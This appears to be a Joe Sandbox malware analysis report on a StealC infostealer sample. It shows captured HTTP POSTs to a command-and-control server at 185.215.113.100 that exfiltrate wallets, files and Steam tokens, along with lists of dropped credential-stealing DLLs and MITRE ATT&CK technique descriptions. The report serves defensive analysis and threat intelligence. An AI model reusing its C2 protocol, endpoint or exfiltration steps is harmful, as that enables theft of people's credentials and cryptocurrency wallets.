Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IECBGIDAEHCGDGCBKEBGHost: 185.215.113.100Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEBKKECBGIIJJKECGIJEHost: 185.215.113.100Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 45 42 4b 4b 45 43 42 47 49 49 4a 4a 4b 45 43 47 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 37 33 30 61 66 66 37 65 32 65 38 30 32 35 37 38 66 30 31 35 63 61 39 66 34 65 66 30 38 33 64 64 64 61 64 62 33 62 62 61 66 65 37 65 38 39 64 35 64 38 36 66 61 64 31 30 65 35 35 66 37 63 38 63 33 33 34 65 66 38 36 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 4b 4b 45 43 42 47 49 49 4a 4a 4b 45 43 47 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 4b 4b 45 43 42 47 49 49 4a 4a 4b 45 43 47 49 4a 45 2d 2d 0d 0a Data Ascii: ------AEBKKECBGIIJJKECGIJEContent-Disposition: form-data; name="token"2730aff7e2e802578f015ca9f4ef083dddadb3bbafe7e89d5d86fad10e55f7c8c334ef86------AEBKKECBGIIJJKECGIJEContent-Disposition: form-data; name="message"wallets------AEBKKECBGIIJJKECGIJE--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJEGIJEGDBFHDGCAFCAEHost: 185.215.113.100Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 45 47 49 4a 45 47 44 42 46 48 44 47 43 41 46 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 37 33 30 61 66 66 37 65 32 65 38 30 32 35 37 38 66 30 31 35 63 61 39 66 34 65 66 30 38 33 64 64 64 61 64 62 33 62 62 61 66 65 37 65 38 39 64 35 64 38 36 66 61 64 31 30 65 35 35 66 37 63 38 63 33 33 34 65 66 38 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 47 49 4a 45 47 44 42 46 48 44 47 43 41 46 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 47 49 4a 45 47 44 42 46 48 44 47 43 41 46 43 41 45 2d 2d 0d 0a Data Ascii: ------JJEGIJEGDBFHDGCAFCAEContent-Disposition: form-data; name="token"2730aff7e2e802578f015ca9f4ef083dddadb3bbafe7e89d5d86fad10e55f7c8c334ef86------JJEGIJEGDBFHDGCAFCAEContent-Disposition: form-data; name="message"files------JJEGIJEGDBFHDGCAFCAE--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKFIDHDGIEGCAKFIIJKFHost: 185.215.113.100Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 46 49 44 48 44 47 49 45 47 43 41 4b 46 49 49 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 37 33 30 61 66 66 37 65 32 65 38 30 32 35 37 38 66 30 31 35 63 61 39 66 34 65 66 30 38 33 64 64 64 61 64 62 33 62 62 61 66 65 37 65 38 39 64 35 64 38 36 66 61 64 31 30 65 35 35 66 37 63 38 63 33 33 34 65 66 38 36 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 46 49 44 48 44 47 49 45 47 43 41 4b 46 49 49 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 46 49 44 48 44 47 49 45 47 43 41 4b 46 49 49 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 46 49 44 48 44 47 49 45 47 43 41 4b 46 49 49 4a 4b 46 2d 2d 0d 0a Data Ascii: ------AKFIDHDGIEGCAKFIIJKFContent-Disposition: form-data; name="token"2730aff7e2e802578f015ca9f4ef083dddadb3bbafe7e89d5d86fad10e55f7c8c334ef86------AKFIDHDGIEGCAKFIIJKFContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------AKFIDHDGIEGCAKFIIJKFContent-Disposition: form-data; name="file"------AKFIDHDGIEGCAKFIIJKF--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHJKJDAKEHJDGDGDGHIDHost: 185.215.113.100Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 4a 4b 4a 44 41 4b 45 48 4a 44 47 44 47 44 47 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 37 33 30 61 66 66 37 65 32 65 38 30 32 35 37 38 66 30 31 35 63 61 39 66 34 65 66 30 38 33 64 64 64 61 64 62 33 62 62 61 66 65 37 65 38 39 64 35 64 38 36 66 61 64 31 30 65 35 35 66 37 63 38 63 33 33 34 65 66 38 36 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 4a 44 41 4b 45 48 4a 44 47 44 47 44 47 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 4a 44 41 4b 45 48 4a 44 47 44 47 44 47 48 49 44 2d 2d 0d 0a Data Ascii: ------GHJKJDAKEHJDGDGDGHIDContent-Disposition: form-data; name="token"2730aff7e2e802578f015ca9f4ef083dddadb3bbafe7e89d5d86fad10e55f7c8c334ef86------GHJKJDAKEHJDGDGDGHIDContent-Disposition: form-data; name="message"ybncbhylepme------GHJKJDAKEHJDGDGDGHID--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJJKFBAAAFHJEBFIEGIDHost: 185.215.113.100Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4a 4b 46 42 41 41 41 46 48 4a 45 42 46 49 45 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 37 33 30 61 66 66 37 65 32 65 38 30 32 35 37 38 66 30 31 35 63 61 39 66 34 65 66 30 38 33 64 64 64 61 64 62 33 62 62 61 66 65 37 65 38 39 64 35 64 38 36 66 61 64 31 30 65 35 35 66 37 63 38 63 33 33 34 65 66 38 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 4b 46 42 41 41 41 46 48 4a 45 42 46 49 45 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 4b 46 42 41 41 41 46 48 4a 45 42 46 49 45 47 49 44 2d 2d 0d 0a Data Ascii: ------JJJKFBAAAFHJEBFIEGIDContent-Disposition: form-data; name="token"2730aff7e2e802578f015ca9f4ef083dddadb3bbafe7e89d5d86fad10e55f7c8c334ef86------JJJKFBAAAFHJEBFIEGIDContent-Disposition: form-data; name="message"wkkjqaiaxkhb------JJJKFBAAAFHJEBFIEGID--

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\AEBKKECB

C:\ProgramData\AEBKKECBGIIJJKECGIJECGDHIE

C:\ProgramData\AFBAFBKEGCFBGCBFIDAKEHDAFC

C:\ProgramData\AKFIDHDG

C:\ProgramData\EGCFIDAFBFBAKFHJEGIJ

C:\ProgramData\FCAAEHJDBKJJKFHJEBKF

C:\ProgramData\HDAFHIDGIJKJKECBGDBGHDBKFH

C:\ProgramData\IDBAKKECAEGCAKFIIIDHCBAKKJ

C:\ProgramData\IJECBGIJDGCAEBFIIECA

C:\ProgramData\freebl3.dll

C:\ProgramData\mozglue.dll

C:\ProgramData\msvcp140.dll

C:\ProgramData\nss3.dll

C:\ProgramData\softokn3.dll

Windows Analysis Report
file.exe

Function 00199270 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212
libraryloaderCOMMON

Function 00184610 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148
memoryCOMMON

Function 0018BCB0 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675
fileCOMMON

Function 6C6735A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294
stringtimeCOMMON

Function 001943F0 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172
fileCOMMON

Function 001995E0 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684
libraryloaderCOMMON

Function 00187750 Relevance: 81.6, APIs: 54, Instructions: 584
stringmemoryCOMMON

Function 00190090 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366
stringmemoryCOMMON

Function 00185150 Relevance: 47.8, APIs: 19, Strings: 8, Instructions: 572
stringnetworkmemoryCOMMON

Function 001859B0 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495
networkstringmemoryCOMMON

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre